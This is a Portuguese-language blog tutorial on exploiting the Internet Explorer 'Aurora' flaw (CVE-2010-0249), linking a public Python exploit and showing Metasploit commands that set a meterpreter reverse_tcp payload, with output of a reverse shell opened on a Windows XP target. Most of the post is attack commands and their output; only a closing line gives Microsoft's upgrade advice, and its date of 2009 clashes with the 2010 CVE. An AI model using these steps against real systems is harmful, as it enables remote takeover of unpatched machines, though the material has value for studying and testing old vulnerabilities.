Dia 17/01/2009 a galera da Offensive Security disponibilizou um exploit que explora a vulnerabilidade aurora (CVE-2010-0249) encontrada no Internet Explorer 6, 6 SP1, 7 em várias versões do windows.
O exploit disponibilizado é desenvolvido em phyton e executa a calculadora do windows no alvo.
O download pode ser feito em: http://www.exploit-db.com/exploits/11167.
para usa é fácil. É necessário ter o phyton defidamente instalado.
Windows/Linux:$ python ie_aurora.py 8080
[-] Web server is running at http://
127.0.0.1:8080/
onde:
8080 - porta local
depois é só acessar pelo IE o endereço mostrado pelo script, no caso, http://127.0.0.1:8080/.
O exploit será enviado e a calculadora executada no alvo.
Executar uma calculadora não é nada útil, mas, você pode modificar o script e colocar um payload metasploit para ser executado no lugar da calculadora, ou ainda, usar o próprio módulo do Metasploit, que facilita muito todo o trabalho. Irei mostrar agora como explorar essa vulnerabilidade pelo metasploit.
Primeiro execute o update do Metasploit(msfupdate), como Administrador ou root, para pegar os novos módulos. Depois rode o console do metasploit e faça:
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
O payload usado abre uma conexão reversa no alvo. Em seguida abra o IE e acesse o endereço mostrado (http://192.168.0.151:8080/).
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
Pronto. Você já tem acesso shell disponível no alvo.
Obs: Aparentemente só funciona com o IE 6. Meus testes com windows XP SP3 e Internet Explorer 6 funcionaram perfeitamente, porém, no windows Vista e Internet Explorer 7 não obtive resultado.
################
Solução: Segundo nota emitida pela Microsoft a melhor forma de se pevenir do ataque é atualizando seu Internet Explorer para a versão 8.
Referências:
http://www.microsoft.com/technet/security/advisory/979352.mspx
Giorge Henrique Abdala
Nenhum comentário:
Postar um comentário